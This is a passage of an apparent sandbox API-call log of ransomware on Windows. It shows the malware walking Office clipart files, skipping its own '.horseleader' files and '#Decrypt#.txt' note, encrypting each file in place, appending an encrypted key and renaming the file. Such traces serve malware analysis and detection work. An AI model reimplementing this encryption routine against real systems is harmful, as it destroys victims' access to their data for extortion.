(hObject=0x158) returned 1 [0253.892] GetProcessHeap () returned 0x780000 [0253.892] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.892] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.horseleader") returned 79 [0253.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00255_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00255_.wmf.horseleader")) returned 1 [0253.893] GetProcessHeap () returned 0x780000 [0253.893] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.893] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00256_.WMF", cAlternateFileName="")) returned 1 [0253.893] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="Windows") returned -1 [0253.893] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0253.893] StrStrIW (lpFirst="DD00256_.WMF", lpSrch=".horseleader") returned 0x0 [0253.893] lstrcmpW (lpString1="DD00256_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.893] lstrcmpW (lpString1="DD00256_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.894] lstrlenW 
(lpString=".testttjffg") returned 11 [0253.894] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.894] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.894] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.894] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 67 [0253.894] StrStrW (lpFirst="DD00256_.WMF", lpSrch=".txt") returned 0x0 [0253.894] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2832) returned 1 [0253.894] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xb10, lpOverlapped=0x0) returned 1 [0253.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff4f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.896] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xb10, lpOverlapped=0x0) returned 1 [0253.896] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.896] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.896] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.897] CloseHandle (hObject=0x158) returned 1 [0253.897] GetProcessHeap () returned 0x780000 [0253.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.897] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.horseleader") returned 79 [0253.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.horseleader")) returned 1 [0253.898] GetProcessHeap () returned 0x780000 [0253.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.898] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe550c00, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbe550c00, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0x9456, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00261_.WMF", cAlternateFileName="")) returned 1 [0253.898] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="Windows") returned -1 [0253.898] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0253.898] StrStrIW (lpFirst="DD00261_.WMF", lpSrch=".horseleader") returned 0x0 [0253.898] lstrcmpW (lpString1="DD00261_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.898] lstrcmpW (lpString1="DD00261_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.898] lstrlenW (lpString=".testttjffg") returned 11 [0253.898] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.898] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.898] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 67 [0253.899] StrStrW (lpFirst="DD00261_.WMF", lpSrch=".txt") returned 0x0 [0253.899] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=37974) returned 1 [0253.899] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.901] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0253.902] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.902] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4456, lpOverlapped=0x0) returned 1 [0253.903] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbbaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4456, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4456, lpOverlapped=0x0) returned 1 [0253.903] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.903] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.903] CloseHandle (hObject=0x158) returned 1 [0253.903] GetProcessHeap () returned 0x780000 [0253.903] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.903] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.horseleader") returned 79 [0253.903] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00261_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00261_.wmf.horseleader")) returned 1 [0253.905] GetProcessHeap () returned 0x780000 [0253.905] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.905] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8572f00, ftCreationTime.dwHighDateTime=0x1bd4b20, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb8572f00, ftLastWriteTime.dwHighDateTime=0x1bd4b20, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00297_.WMF", cAlternateFileName="")) returned 1 [0253.905] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="Windows") returned -1 [0253.905] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0253.905] StrStrIW (lpFirst="DD00297_.WMF", lpSrch=".horseleader") returned 0x0 [0253.905] lstrcmpW (lpString1="DD00297_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.905] lstrcmpW (lpString1="DD00297_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.905] lstrlenW (lpString=".testttjffg") returned 11 [0253.905] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.905] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.905] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.906] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF") returned 67 [0253.906] StrStrW (lpFirst="DD00297_.WMF", lpSrch=".txt") returned 0x0 [0253.906] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=40030) returned 1 [0253.906] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.908] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.908] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.909] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4c5e, lpOverlapped=0x0) returned 1 [0253.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb3a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.909] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4c5e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4c5e, lpOverlapped=0x0) returned 1 
[0253.909] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.910] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.910] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.910] CloseHandle (hObject=0x158) returned 1 [0253.910] GetProcessHeap () returned 0x780000 [0253.910] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.910] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.horseleader") returned 79 [0253.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00297_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00297_.wmf.horseleader")) returned 1 [0253.911] GetProcessHeap () returned 0x780000 [0253.911] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.911] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c4300, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5d8c4300, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x318, 
dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00372_.WMF", cAlternateFileName="")) returned 1 [0253.911] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="Windows") returned -1 [0253.911] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0253.911] StrStrIW (lpFirst="DD00372_.WMF", lpSrch=".horseleader") returned 0x0 [0253.911] lstrcmpW (lpString1="DD00372_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.911] lstrcmpW (lpString1="DD00372_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.911] lstrlenW (lpString=".testttjffg") returned 11 [0253.911] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.911] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.911] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.912] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF") returned 67 [0253.913] StrStrW (lpFirst="DD00372_.WMF", lpSrch=".txt") returned 0x0 [0253.913] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=792) returned 1 [0253.913] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesRead=0x32aedf4*=0x318, lpOverlapped=0x0) returned 1 [0253.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffce8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.914] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x318, lpOverlapped=0x0) returned 1 [0253.914] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.915] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.915] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.915] CloseHandle (hObject=0x158) returned 1 [0253.915] GetProcessHeap () returned 0x780000 [0253.915] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.915] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.horseleader") returned 79 [0253.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00372_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00372_.wmf.horseleader")) returned 1 [0253.916] GetProcessHeap () returned 0x780000 [0253.916] HeapFree (in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.916] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x44b0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="DD00405_.WMF", cAlternateFileName="")) returned 1 [0253.916] lstrcmpiW (lpString1="DD00405_.WMF", lpString2="Windows") returned -1 [0253.916] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0253.916] StrStrIW (lpFirst="DD00405_.WMF", lpSrch=".horseleader") returned 0x0 [0253.916] lstrcmpW (lpString1="DD00405_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.916] lstrcmpW (lpString1="DD00405_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.916] lstrlenW (lpString=".testttjffg") returned 11 [0253.916] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.916] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.916] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.917] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 67 [0253.917] StrStrW (lpFirst="DD00405_.WMF", lpSrch=".txt") returned 0x0 [0253.917] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=17584) returned 1 [0253.917] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x44b0, lpOverlapped=0x0) returned 1 [0253.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbb50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x44b0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x44b0, lpOverlapped=0x0) returned 1 [0253.919] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.919] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.919] CloseHandle (hObject=0x158) returned 1 [0253.919] GetProcessHeap () returned 0x780000 [0253.919] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.919] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.horseleader") returned 79 [0253.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.horseleader")) returned 1 [0253.920] GetProcessHeap () returned 0x780000 [0253.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.920] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 